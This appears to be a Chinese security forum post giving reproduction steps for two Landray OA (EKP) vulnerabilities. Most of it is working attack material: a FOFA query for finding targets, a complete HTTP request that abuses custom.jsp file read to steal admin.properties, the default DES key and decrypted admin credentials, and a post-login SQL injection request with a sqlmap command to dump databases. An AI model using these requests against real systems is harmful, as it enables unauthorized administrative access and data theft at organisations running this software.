后台密码读解密
漏洞描述
蓝凌OA(EKP)存在任意文件读取漏洞。可利用漏洞获取敏感信息,读取配置文件得到密码后访问后台
漏洞影响版本
蓝凌OA
FOFA
app=“Landray-OA系统”
漏洞复现
利用custom.jsp任意文件读取漏洞来读取配置文件
POST请求:
http://x.x.x.x/sys/ui/extend/varkind/custom.jsp
读取配置文件:
/WEB-INF/KmssConfig/admin.properties
此处需要写为如下格式:
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
Burp构造数据包
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: X.X.X.X
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
接着可以将得到的密钥:
chuciDiIU2nhEz\/JLVTdUw==
拿去DES在线解密网站进行解密默认密钥:kmssAdminKey
在线解密网站:http://tool.chacuo.net/cryptdes
登录系统
账户admin
密码abcABC123
后台SQL注入 CNVD-2021-01363
影响版本
2021-3-24 前版本
漏洞复现
存在漏洞的URL
https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
构造数据包(注意替换后台cookie)
GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=77CDA7F42BF28CB78E5AC84B8A560664
保存为此文件,使用sqlmap跑注入
sqlmap -r sql.txt -p orderby --dbs
参考文章
蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363 | CN-SEC 中文网
http://cn-sec.com/archives/299683.html 蓝凌OA后台密码读解密+POC – Chen-w – 博客园
https://www.cnblogs.com/chen-w/p/14884175.html
请登录后查看回复内容